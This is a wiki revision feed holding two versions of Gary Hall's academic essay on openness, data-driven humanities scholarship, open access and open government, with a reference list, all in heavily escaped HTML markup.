&amp;lt;blockquote&amp;gt;[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader It expects something of the scale of humanities scholarship] which I’m not sure is true anymore: that a single scholar—nay, every scholar—working alone will, over the course of his or her lifetime ... make a fundamental theoretical advance to the field. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Increasingly, this expectation is something peculiar to the humanities. ...it required the work of a generation of mathematicians and observational astronomers, gainfully employed, to enable the eventual “discovery” of Neptune... Since the scientific revolution, most theoretical advances play out over generations, not single careers. (Scheinfeldt, 2010b)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Now, it is absolutely important that we as scholars experiment with the new tools, methods and materials that digital media technologies create and make possible, in order to bring into play new forms of Foucauldian ''dispositifs'', or what Bernard Stiegler calls ''hypomnemata'', or what I am trying to think in terms of [http://garyhall.info media gifts]. I would include in this 'experimentation imperative’ techniques and methodologies drawn from computer science and other related fields, such as information visualisation, data mining and so forth. Nevertheless, there is something troubling about this kind of deferral of critical and self-reflexive theoretical questions to an unknown point in time, still possibly a generation away. After all, the frequent suggestion is that now is not the right time to be making any such decision or judgement, since we cannot yet know how humanists will eventually come to use these tools and data, and thus what data-driven scholarship may or may not turn out to be capable of, critically, politically, theoretically. One of the consequences of this deferral, however, is that it makes it extremely difficult to judge whether this postponement is indeed acting as a responsible, political and ethical opening to the (heterogeneity and incalculability of the) future, including the future of the humanities; or whether it is serving as an alibi for a naive and rather superficial form of scholarship instead ([https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/ Meeks], 2010). A form of scholarship moreover that, in uncritically and un-self-reflexively adopting techniques and methodologies drawn from computer science, can be seen as part of the larger shift in contemporary society which Lyotard associates with the widespread use of computers and databases, and with the exteriorization of knowledge in relation to the ‘knower’. As we have seen, it is a movement away from a concern with ideals, with what is right and just and true, and toward a concern to legitimate power by optimizing the system’s performance in instrumental, functional terms. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; All of this raises some rather significant and timely questions for the humanities. Is it merely a coincidence that such a turn toward science, computing and data-intensive research is gaining momentum at a time when the UK government is emphasizing the importance of the STEM subjects (science, technology, engineering and medicine) and withdrawing support and funding from the humanities? Or is one of the reasons all this is happening now due to the fact that the humanities, like the sciences themselves, are under pressure from government, business, management, industry and increasingly the media to prove they provide value for money in instrumental, functional, performative terms? Is the interest in computing a strategic decision on the part of some of those in the humanities? As the project of Cohen and Gibbs shows, one can get funding from the likes of Google (D. Cohen, 2010). In fact, in the summer of 2010 [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘Google awarded $1 million to professors doing digital humanities research’] (P. Cohen, 2010). 
To what extent is the take-up of practical techniques and approaches from computing science providing some areas of the humanities with a means of defending (and refreshing) themselves in an era of global economic crisis and severe cuts to higher education, through the transformation of their knowledge and learning into quantities of information –- so-called ‘deliverables’? Can we even position the ‘computational turn’ as an event created to justify such a move on the part of certain elements within the humanities ([http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/ Frabetti], 2010)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Where does all this leave us as far as this Living Book on open science is concerned? As the argument above hopefully demonstrates, it is clearly not enough just to attempt to reveal or recover the scientific truth about, say, the environment, to counter the disinformation of others involved in the likes of the Climategate controversy. Nor is it enough merely to make the scientific research openly accessible to the public. Equally, it is not satisfactory simply to make the information, data, and associated tools, techniques and resources freely available to those in the humanities, so they can collectively and collaboratively search, mine, map, graph, model, visualize, analyse and interpret it in new ways – including some that may make it less abstract and easier for the majority of those in society to understand and follow – and, in doing so, help bridge the gap between the ‘two cultures’. It is not so much that there is a lack of information, or access to the right kind of information, or information presented in the right kind of way to ensure that the message of the scientific research and data comes across effectively and efficiently. It is not even that there is too much information, too much white noise, as ‘Bifo’ et al call it (2009: 141-142). To be sure, as a [http://oxygen.mintel.com/sinatra/reports/display/id=479774 2010 Mintel report] showed – to stay with the example of climate change – most people in the UK already know what is happening to the environment. They are just suffering from Green Fatigue, they are bored with thinking about it and thus enacting a backlash against what they perceive as ‘extreme’ pressure from environmentalist groups. This is perhaps one reason why [http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html ‘the number of cars on UK roads has risen from just over 26million in 2005 to more than 31 million in 2009’] (Shields, 2010: 30). Yet to argue there is too much information rather risks implying that there is a proper amount of information, and what would that be?&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; So we might not want to go along with Gilles Deleuze and Felix Guattari when they contend that ‘we do not lack communication. On the contrary, we have too much of it’. But we might nevertheless agree when they argue that what we actually lack is creation: ‘We lack resistance to the present’ (1994: 108). In this respect, it is not just a case of supplying more scientific research and data; nor of making the research and data that has otherwise been closed, hidden, denied or suppressed openly available for free – by opening the already existing memory and databanks to the people, for example (which is what Lyotard ended by suggesting we do). 
It is also a case of creating work around the research and data that does not simply go along with the shift in the status and nature of knowledge that is currently taking place. As we have seen, it is a shift toward STEM subjects and away from the humanities; toward a concern with optimizing the social system’s performance in instrumental, functional terms, and away from a concern with questions of what is just and right; and toward an emphasis on openness, freedom and transparency, and away from what is capable of disrupting and disturbing society, and what, in remaining resistant to a culture of measurement and calculation, maintains a much needed element of inaccessibility, inefficiency, delay, error, antagonism, heterogeneity and dissensus within the system. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Can this Living Book on open science be considered one such a creation? And can this series of Living Books about Life be considered another? Are they instances of a resistance to the present? Or just more white noise? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; (The above is based on a paper presented at the Data Landscapes, AHRC network event, held in conjunction with the British Antarctic Survey at the University of Westminster, London, December 15, 2010. An earlier version of some of the material provided above appeared in Hall [2010]) &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''References''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Arthur, C. (2010), ‘Will Brussels Curb Google Guys’, ''The Guardian'', December 6. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; 'Bifo' Berardi, F., Jacquemet, M. and Vitali, G. (2009), ''Ethereal Shadows: Communications and Power in Contemporary Italy''. Brooklyn, New York: Autonomedia. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Bergman, M. K. (2001), ‘The Deep Web: Surfacing Hidden Value’, ''JEP: The Journal of Electronic Publishing'', vol.7, no.1, August. http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104.&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Birchall, C. (2011) 'There's Been Too Much Secrecy in this City&amp;quot;: The False Choice Between Secrecy and Transparency in US Politics,' ''Cultural Politics''&amp;amp;nbsp;7(1), March: 133-156.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Birchall, C (2011b forthcoming) ‘Transparency, Interrupted: Secrets of the Left’, Between Transparency and Secrecy', Annual Review, ''Theory, Culture and Society, ''December.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Blair, T. (2010), ''A Journey''. London: Hutchinson. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clinton, H. (2010), ‘Internet Freedom: The Prepared Text of U.S. of Secretary of State Hillary Rodham Clinton's speech, delivered at the Newseum in Washington, D.C., January 21. http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, D. (2010), ‘Searching for the Victorians’, ''Dan Cohen'', October 4. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, P. (2010) ‘Digital Keys for Unlocking the Humanities’ Riches’, ''The New York Times'', November 16. http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;amp;hp=&amp;amp;amp;pagewanted=all. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Croxall, B. 
(2010) response to Tanner Higgen, ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. September 10. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze G. and Guattari, F. (1988) ''A Thousand Plateaus: Capitalism and Schizophrenia''. London: Athlone. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze G. and Guattari, F. (1994), ''What is Philosophy?''. New York: Columbia University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fung, A., Graham, M., Weil, D. (2007), ''Full Disclosure: The Perils and Promise of Transparency''. Cambridge: Cambridge University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Frabetti, F. (2010) ‘Digital Again? The Humanities Between the Computational Turn and Originary Technicity’, talk given to the Open Media Group, Coventry School of Art and Design. November 9. http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Franklin, K. D. and Rodriguez’G, K. (2008) ‘The Next Big Thing in Humanities, Arts and Social Science Computing: Cultural Analytics’,''HPC Wire''. July 29. http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gibbs, R. (2010), Presidential press secretary, cited in ‘White House condemns WikiLeaks' release’, ''MCNBC.com News'', November 28. http://www.msnbc.msn.com/id/40405589/ns/us_news-security. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010a), ‘Open Data: Empowering the Empowered or Effective Data Use for Everyone?’, ''Gurstein’s Community Infomatics'', September, 2. http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010b), ‘Open Data (2): Effective Data Use’, ''Gurstein’s Community Infomatics'', September, 9. http://gurstein.wordpress.com/2010/09/09/open-data-2-effective-data-use/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2011), ‘Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide’, posting to the nettime mailing list, July, 5. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hall, G. (2010), 'We Can Know It For You: The Secret Life of Metadata', ''How We Became Metadata''. London: Institute for Modern and Contemporary Culture, University of Westminster. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Higgen, T. (2010) ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. May 25. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hindman, M. (2009), ''The Myth of Digital Democracy''. Princeton, NJ and Oxford: Princeton University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hoffman, M. (2010), ‘EFF Posts Documents Detailing Law Enforcement Collection of Data From Social Media Sites’, ''Electronic Frontier Foundation''. March 16. http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Houghton, J. (2009) ‘Open Access - What are the Economic Benefits?: A Comparison of the United Kingdom, Netherlands and Denmark’, Centre for Strategic Economic Studies, Victoria University, Melbourne. 
http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Jarvis, J. (2010), ‘Time For Citizens of the Internet to Stand Up’, ''The Guardian: MediaGuardian'', March 29. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; JISC (2009), ‘Press Release: Open Science - the future for research?, posting to the BOAI list, November 16. 2009. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Kerssens, N. and Dekker A. (2009), ‘Interview with Lev Manovich for Archive 2020’, ''Virtueel_ Platform''. http://www.virtueelplatform.nl/#2595. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Knouf, N. (2010), ‘The JJPS Extension: Presenting Academic Performance Information’, ''Journal of Journal Performance Studies'', Vol 1, No 1. Available at http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6. Accessed 20 June, 2010. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Latour, B (2004), ‘Why Has Critique Run Out of Steam? From Matters of Fact to Matters of Concern”’, ''Critical Inquiry'', Vol. 30, Number 2. http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Liu, A. (2011) ‘Where is Cultural Criticism in the Digital Humanities’. Paper presented at the panel on ‘The History and Future of the Digital Humanities’” Modern Language Association convention, Los Angeles, January 7. http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J-F. (1986), ''The Postmodern Condition: A Report on Knowledge''. Manchester: Manchester University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J.-F. (1991) ''The Inhuman: Reflections on Time''. Cambridge: Polity. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2010a) ‘Cultural Analytics Lectures by Manovich in UK (London and Swansea), March 8-9, 2010’, ''Software Studies Initiative''. March 8. http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2011) ‘Trending: The Promises and the Challenges of Big Social Data’,''Lev Manovich'', April 28: http://www.manovich.net/DOCS/Manovich_trending_paper.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meeks, E. (2010), ‘The Digital Humanities as Imagined Community’, ''Digital Humanities Specialist''. September 14. https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mintel report, ‘Energy Efficiency in the Home - UK - July 2010’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Murray, S. Choi, S., Hoey, J., Kendall, C., Maskalyk, J., and Palepu, A. (2008), ‘Open Science, Open Access and Open Source Software at ''Open Medicine''’, ''Open Medicine'', 2(1): e1–e3. http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/?tool=pmcentrez http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Patterson, M. (2009), ‘Article-Level Metrics at PloS – Addition of Usage Data’, ''PLoS: Public Library of Science''. September 16. http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Pubget (2010), ‘[BOAI] PLoS Launches Fast (Open) PDF Access with Pubget’, posted on the BOAI list by Peter Suber, March 8. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Poynder, R. 
(2010), ‘Interview With Jean-Claude Bradley: The Impact of Open Notebook Science’, ''Information Today'', September. http://www.infotoday.com/IT/sep10/Poynder.shtml. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2008), ‘Sunset for Ideology, Sunrise for Methodology?’, ''Found History'', March 13. http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010a) ‘Where’s the Beef?: Does Digital Humanities Have to Answer Questions?’, ''Found History'', March 13. http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010b) response to Dan Cohen, ‘Searching for the Victorians’, ''Dan Cohen''. October 5. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Shields, R. (2010), ‘Green Fatigue Hits Campaign to Reduce Carbon Footprint’, ''The Independent'', October 10. http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Sterling, B. (2005), ''Shaping Things''. Massachussetts: MIT. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stolberg, S. G. (2009), ‘On First Day, Obama Quickly Sets a New Tone’”, ''The New York Times''. January 21. http://www.nytimes.com/2009/01/22/us/politics/22obama.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swan, A. (2009), ‘Open Access and Open Data’, ''2nd NERC Data Management Workshop'', Oxford. February 17-18. http://eprints.ecs.soton.ac.uk/17424/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swartz, A. (2010), ‘When is Transparency Useful?’ ''Aaron Swartz’s Raw Thought blog'', February 11. http://www.aaronsw.com/weblog/usefultransparency. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Vaidhyanathan, S. (2009), ‘The Googlization of Universities’, ''The NEA 2009 Almanac of Higher Education''. http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wark, M. (2004), ''A Hacker Manifesto''. Harvard: Harvard University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Westcott, S. (2009) ‘Global Warming: Brits Deny Humans are to Blame,’ ''The Express'', December 7. http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The White House (2009), ‘Memorandum for the Heads of Executive Departments and Agencies: Transparency and Open Government’. January 21. http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wollen, P. and Cooke, L. eds (1995), ''Visual Display: Culture Beyond Appearances''. Seattle: Bay Press.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5503</id>
		<title>Open science/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5503"/>
		<updated>2013-11-03T14:56:33Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me Back to the book] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
= '''White Noise: On the Limits of Openness (Living Book Mix)'''  =&lt;br /&gt;
&lt;br /&gt;
= Gary Hall  =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;PH54cp2ggFk&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the explicit aims of the Living Books About Life series is to provide a point of interrogation and contestation, as well as connection and translation, between the humanities and the sciences (partly to avoid slipping into 'scientism'). Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from (in this case) ''computer science'' and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being used to produce new ways of approaching and understanding texts in the humanities; what is sometimes thought of as ‘the digital humanities’. The concern in the main has been with either digitizing ‘born analog’ humanities texts and artifacts (e.g. making annotated editions of the art and writing of [http://www.blakearchive.org/blake/ William Blake] available to scholars and researchers online), or gathering together ‘born digital’ humanities texts and artifacts (videos, websites, games, photography, sound recordings, 3D data), and then taking complex and often extremely large-scale data analysis techniques from computer science and related fields and applying them to these humanities texts and artifacts – to this ‘big data’, as it has been called. Witness Lev Manovich and the Software Studies Initiative’s use of ‘[http://www.manovich.net/DOCS/Manovich_trending_paper.pdf digital image analysis and new visualization techniques]’ to study ‘20,000 pages of Science and Popular Science magazines… published between 1872-1922, 780 paintings by van Gogh, 4535 covers of Time magazine (1923-2009) and one million manga pages’ (Manovich, 2011), and Dan Cohen and Fred Gibbs’s text mining of ‘[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader the 1,681,161 books that were published in English in the UK in the long nineteenth century]’ (D. Cohen, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; What ''Digitize Me, Visualize Me, Search Me'' endeavours to show is that such data-focused transformations in research can be seen as part of a major alteration in the status and nature of knowledge. It is an alteration that, according to the philosopher Jean-François Lyotard, has been taking place since at least the 1950s, and involves nothing less than a shift away from a concern with questions of what is right and just, and toward a concern with legitimating power by optimizing the social system’s performance in instrumental, functional terms. This shift has significant consequences for our idea of knowledge. Indeed, for Lyotard: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The nature of knowledge cannot survive unchanged within this context of general transformation. It can fit into the new channels, and become operational, only if learning is translated into quantities of information. We can predict that anything in the constituted body of knowledge that is not translatable in this way will be abandoned and that the direction of new research will be dictated by the possibility of its eventual results being translatable into computer language. The ‘producers’ and users of knowledge must now, and will have to, possess the means of translating into these languages whatever they want to invent or learn. Research on translating machines is already well advanced. Along with the hegemony of computers comes a certain logic, and therefore a certain set of prescriptions determining which statements are accepted as ‘knowledge’ statements. (1986: 4)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In particular, ''Digitize Me, Visualize Me, Search Me'' suggests that the turn in the humanities toward data-driven scholarship, science visualization, statistical data analysis, etc. can be placed alongside all those discourses that are being put forward at the moment – in both the academy and society – in the name of greater openness, transparency, efficiency and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Access ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The open access movement provides a case in point. Witness [http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf John Houghton’s] 2009 comparison of the benefits of OA for the United Kingdom, Netherlands and Denmark, which claims to show that the open access academic publishing model, in which peer-reviewed scholarly research and publications are made available for free online to all those who are able to access the Internet, is actually the most cost-effective mechanism for scholarly publishing. Others, meanwhile, have detailed the increases open access publishing enables in the amount of material that can be published, searched and stored, in the number of people who can access it, in the impact of that material, the range of its distribution, and in the speed and ease of reporting and information retrieval. The following announcement, posted on the BOAI (Budapest Open Access Initiative) list in March 2010, is fairly typical in this respect: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Today PLoS released Pubget links across its journal sites. Now, when users are browsing thousands of reference citations on PLoS journals they will be able to get to the full text article faster than ever before. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Specifically, when readers encounter citations to articles as recorded by CrossRef (which are accessed via the ‘CrossRef’ link in the ‘Cited in’ section of any article’s Metrics tab), a PDF icon will also appear if it is freely available via Pubget. Clicking on the icon will take you directly to the PDF. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; On launching this new functionality, Pete Binfield, Publisher of PLoS ONE and the Community Journals said: ‘Any service, like Pubget, that makes it easier for authors to quickly find the information they need is a welcome addition to our articles. We like how Pubget helps to break down content walls in science, letting users get instantly to the article-level detail that they seek.’ (Pubget, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Data ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet it is not just the research literature that is positioned as being rendered more accessible by scientists. Even the data created in the course of scientific research is promoted as being made freely and openly available for others to use, analyse and build upon. This includes data sets that are too large to be included in any resulting peer-reviewed publications. Known as open data, or data-sharing, this initiative is motivated by the idea that publishing data online on an open basis endows it with a [http://eprints.ecs.soton.ac.uk/17424/1/Swan_-_NERC_09.pptx ‘vastly increased utility’]. Digital data sets are said to be ‘easily passed around’; they are seemingly ‘more easily reused’, reanalysed and checked for accuracy and validity; and they supposedly contain more ‘opportunities for educational and commercial exploitation’ (Swan, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, certain academic publishers are already viewing the linking of their journals to the underlying data as another of the ‘value-added’ services they can offer, to set alongside automatic alerting and sophisticated citation, indexing, searching and linking facilities (and, no doubt, to help ward off the threat of disintermediation posed by the development of digital technology, which enables academics to take over the means of dissemination and publish their work for and by themselves cheaply and easily). Significantly, a [http://www.jisc.ac.uk/publications/documents/opensciencerpt.aspx 2009 JISC report] also identified ‘open-ness, predictive science based on massive data volumes and citizen involvement as [all] being important features of tomorrow’s research practice’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a further move in this direction, all Public Library of Science (PLoS) journals are now providing a broad range of article-level metrics and indicators relating to usage data on an open basis. No longer withheld as trade secrets, these metrics reveal which articles are attracting the most views, citations from the scholarly literature, social bookmarks, coverage in the media, comments, responses, ‘star’ ratings, blog coverage, and so on. PLoS has positioned this programme as enabling science scholars to assess [http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/ ‘research articles on their own merits rather than on the basis of the journal (and its impact factor) where the work happens to be published’], and they encourage readers to carry out their own analyses of this open data (Patterson, 2009). Yet it is difficult not to perceive such article-level metrics and management tools as also being part of the wider process of transforming knowledge and learning into ‘quantities of information’ (Lyotard, 1986: 4); quantities, furthermore, that are produced more to be exchanged, marketed and sold (1986: 4) – for example, by individual academics to their departments, institutions, funders and governments in the form of indicators of ‘quality’ and ‘impact’ (1986: 5). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''From Open Science to Open Government ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such developments around open access and open data are themselves part of the larger trend or phenomenon that is coming to be known as ‘open science’. As Murray et al. put it: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Open science is emerging as a collaborative and transparent approach to research. It is the idea that all data (both published and unpublished) should be freely available, and that private interests should not stymie its use by means of copyright, intellectual property rights and patents. It also embraces open access publishing and open source software… (Murray et al, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting and well-known examples of how such open science may work is provided by the Open Notebook Science of the organic chemist Jean-Claude Bradley. ‘[I]n the interests of openness’, Bradley is making the [http://www.infotoday.com/IT/sep10/Poynder.shtml ‘details of every experiment done in his lab freely available on the web']. This ‘includes all the data generated from these experiments too, even the failed experiments’. What is more, he is doing so in ‘real time’, ‘within hours of production, not after the months or years involved in peer review’ (Poynder, 2010). Again, we can see how emphasis is being placed on the amount of research that can be shared, and the speed with which this can be achieved. This openness on Bradley’s part is also positioned as a means of achieving usefulness and impact, as is evident from the very title of one of his Open Notebook Science projects, [http://usefulchem.wikispaces.com/ UsefulChem]. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; To be fair, however, such discourses around openness, transparency, efficiency and utility are not confined to the sciences – or even the university, for that matter. There are also wider political initiatives, dubbed ‘Open Government’, or ‘Government 2.0’, with both the Labour and the Conservative/Liberal Democrat coalition administrations in the UK making a great display of freeing government information. The Labour government passed the Freedom of Information (FOI) Act in 2000, and then proceeded to launch a [http://www.data.gov.uk website] expressly dedicated to the release of governmental data sets in January 2010. It is a website that the current Conservative/Liberal Democrat coalition government continues to make extensive use of. In a similar vein, the [http://www.freeourdata.org.uk/ Guardian] newspaper has campaigned for the UK government to relinquish its copyright on all local, regional and national data collected with taxpayers’ money and to make such data freely and openly available to the public by publishing it online, where it can be collectively and collaboratively scrutinized, searched, mined, mapped, graphed, cross-tabulated, visualized, audited and interpreted using software tools. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Nor is this phenomenon confined to the UK. In the United States, Barack Obama promised throughout his election campaign to make government more open. He followed this up by issuing a memorandum on transparency the very first day after he became President, vowing to make openness one of [http://www.nytimes.com/2009/01/22/us/politics/22obama.html ‘the touchstones of this presidency’] (Obama, cited in Stolberg, 2009): ‘[http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ My Administration] is committed to creating an unprecedented level of openness in Government. We will work together to ensure the public trust and establish a system of transparency, public participation, and collaboration. Openness will strengthen our democracy and promote efficiency and effectiveness in Government’ (The White House, 2009). 
